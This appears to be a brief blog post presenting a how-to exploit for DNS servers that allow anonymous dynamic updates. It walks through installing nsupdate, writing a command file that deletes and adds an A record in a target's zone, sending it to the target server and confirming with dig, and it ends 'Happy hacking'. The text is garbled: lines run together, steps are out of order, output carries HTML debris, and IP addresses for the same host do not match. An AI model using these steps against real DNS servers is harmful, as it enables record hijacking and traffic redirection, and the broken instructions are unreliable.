Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.
This “guide” is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.
apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:
server 220.127.116.11 #our target DNS serverSave the file as dns. Now just run the following command:
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 18.104.22.168
nsupdate -v dnsnsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:
;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com. IN SOA
;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 22.214.171.124Now just run a quick DiG query to make sure it worked.
dig @126.96.36.199 A evil.corp.company.com That is all I have for this post. Happy hacking